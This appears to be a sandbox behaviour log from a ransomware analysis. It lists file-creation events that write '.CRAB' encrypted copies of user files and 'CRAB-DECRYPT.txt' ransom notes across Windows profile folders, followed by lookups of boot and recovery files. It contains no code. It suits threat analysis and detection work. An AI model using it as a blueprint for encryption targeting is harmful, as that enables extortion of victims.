Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Media\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\LocalLow\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\LocalLow\Microsoft\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B2238AACCEDC3F1FFE8E7EB5F575EC9.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B2238AACCEDC3F1FFE8E7EB5F575EC9.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Identities\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Application Data\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Contacts\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Cookies\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Desktop\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Documents\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Downloads\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Links\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Links\Web Slice Gallery.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Autos.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Money.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Sports.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSNBC News.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Get Windows Live.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Links\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Music\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\My Documents\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\NetHood\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Pictures\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Recent\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Searches\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Searches\Everywhere.search-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\Searches\Indexed Locations.search-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\SendTo\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Templates\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Videos\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default User\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Documents\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Documents\My Music\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Documents\My Pictures\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Documents\My Videos\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Downloads\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Favorites\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Libraries\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Libraries\RecordedTV.library-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Music\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Music\Sample Music\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Music\Sample Music\Kalimba.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Music\Sample Music\Sleep Away.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Pictures\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Recorded TV\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Recorded TV\Sample Media\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Public\Videos\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Videos\Sample Videos\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\bootmgr	type = file_attributes	1	Fn
Get Info	C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi	type = file_attributes	1	Fn
Get Info	C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp	type = file_attributes	1	Fn
